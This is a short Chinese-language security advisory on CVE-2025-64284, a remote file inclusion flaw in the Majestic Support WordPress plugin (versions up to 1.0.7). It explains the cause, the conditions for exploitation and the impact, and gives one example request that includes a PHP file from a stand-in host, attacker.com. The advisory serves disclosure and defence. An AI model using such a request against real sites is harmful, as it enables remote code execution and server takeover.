CVE-2025-64284CVE-2025-64284是WordPress插件Majestic Support中发现的一个高危远程文件包含漏洞。该漏洞源于PHP程序中include/require语句对文件名控制不当,允许攻击者通过构造恶意请求包含远程文件。CVSS评分7.5,属于高危级别漏洞。攻击者可在低权限情况下通过网络远程利用此漏洞,无需用户交互即可实现攻击。成功利用可导致远程代码执行,严重威胁网站安全。Majestic Support插件在1.0.7及以下版本均受影响。该漏洞由Patchstack安全团队发现并报告,建议受影响的用户立即采取修复措施。
该漏洞是经典的PHP远程文件包含(RFI)问题。在Majestic Support插件中存在通过URL参数可控的文件包含逻辑。攻击者可以通过构造类似?file=http://attacker.com/malicious.txt的请求,强制服务器包含远程托管的恶意PHP文件。由于PHP的include/require语句会执行被包含文件中的PHP代码,攻击者可以实现远程代码执行。漏洞利用条件包括:1) PHP配置中allow_url_include未禁用;2) 攻击者可访问存在漏洞的URL端点;3) 攻击者需拥有WordPress站点的基本访问权限(订阅者角色即可)。利用成功后可完全控制服务器,执行任意系统命令、读取敏感配置文件、植入后门等。